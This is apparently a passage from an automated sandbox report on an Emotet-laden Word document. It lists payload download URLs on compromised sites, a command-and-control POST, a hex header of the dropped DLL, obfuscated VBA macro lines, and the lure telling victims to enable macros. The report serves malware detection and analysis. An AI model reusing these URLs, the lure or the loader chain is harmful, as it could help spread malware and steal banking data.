Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in memory: https://somanap.com/wp-admin/P/

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/octet-streamExpires: Wed, 06 Jan 2021 07:49:24 GMTLast-Modified: Wed, 06 Jan 2021 07:49:24 GMTServer: Microsoft-IIS/10.0Set-Cookie: 5ff56b8489beb=1609919364; expires=Wed, 06-Jan-2021 07:50:24 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="QieaYu0XHj8.dll"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 06 Jan 2021 07:49:23 GMTContent-Length: 192000Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@

Source: global traffic

HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 176.53.69.151 176.53.69.151
Source: Joe Sandbox View	IP Address: 5.2.136.90 5.2.136.90

Source: Joe Sandbox View	ASN Name: RADORETR RADORETR
Source: Joe Sandbox View	ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO

Source: global traffic

HTTP traffic detected: POST /76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ HTTP/1.1DNT: 0Referer: 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/Content-Type: multipart/form-data; boundary=--------------sArhAY1ugWdoQVUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 5940Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_0024023A InternetReadFile,

11_2_0024023A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52C8AA2-B174-499E-B3BD-E7523F18DF93}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: petafilm.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in binary or memory: http://givingthanksdaily.com/qlE/VeF/
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2106127906.0000000003B33000.00000004.00000001.sdmp	String found in binary or memory: http://petafilm.com
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in binary or memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in binary or memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/cclea;
Source: powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in binary or memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in binary or memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in binary or memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	String found in binary or memory: https://somanap.com/wp-admin/P/

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 3 N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: pack 2254794.doc	OLE, VBA macro line: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
Source: pack 2254794.doc	OLE, VBA macro line: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
Source: pack 2254794.doc	OLE, VBA macro line: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
Source: pack 2254794.doc	OLE, VBA macro line: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
Source: pack 2254794.doc	OLE, VBA macro line: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
Source: pack 2254794.doc	OLE, VBA macro line: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
Source: pack 2254794.doc	OLE, VBA macro line: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
Source: pack 2254794.doc	OLE, VBA macro line: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
Source: pack 2254794.doc	OLE, VBA macro line: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
Source: pack 2254794.doc	OLE, VBA macro line: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
Source: pack 2254794.doc	OLE, VBA macro line: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
Source: pack 2254794.doc	OLE, VBA macro line: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
Source: pack 2254794.doc	OLE, VBA macro line: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
Source: pack 2254794.doc	OLE, VBA macro line: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
Source: pack 2254794.doc	OLE, VBA macro line: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
Source: pack 2254794.doc	OLE, VBA macro line: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
Source: pack 2254794.doc	OLE, VBA macro line: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
Source: pack 2254794.doc	OLE, VBA macro line: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")	Name: Dn5440l_hb7
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")	Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")	Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")	Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")	Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")	Name: Y4o_ocvl0jti6oho0r
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")	Name: Y4o_ocvl0jti6oho0r

Document contains an embedded VBA with base64 encoded strings

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String vRrzDEngIQvFPJfE
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String kWzGMzIVefGB
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String TthascRlxHZH
Source: VBA code instrumentation	OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String utFMeJhUKJhJ

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5293
Source: unknown	Process created: Commandline size = 5197
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5197	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Vgmfknuplwnwb\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000976F	7_2_1000976F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024B41F	7_2_0024B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00242C63	7_2_00242C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00253895	7_2_00253895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024C0C6	7_2_0024C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024EE78	7_2_0024EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024568E	7_2_0024568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002502C3	7_2_002502C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002542DA	7_2_002542DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00248736	7_2_00248736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00247B63	7_2_00247B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00254B41	7_2_00254B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025340A	7_2_0025340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025687F	7_2_0025687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024F444	7_2_0024F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024E05A	7_2_0024E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025A0AF	7_2_0025A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002448BD	7_2_002448BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002460B9	7_2_002460B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002480BA	7_2_002480BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025889D	7_2_0025889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002488E5	7_2_002488E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00241CFA	7_2_00241CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002520C5	7_2_002520C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024F536	7_2_0024F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250D33	7_2_00250D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024153C	7_2_0024153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00257D03	7_2_00257D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024B112	7_2_0024B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00255D1D	7_2_00255D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00258D1C	7_2_00258D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025511B	7_2_0025511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002469A0	7_2_002469A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00256DB9	7_2_00256DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002561B8	7_2_002561B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00259586	7_2_00259586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024F98C	7_2_0024F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00246D9F	7_2_00246D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00247998	7_2_00247998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002531E2	7_2_002531E2
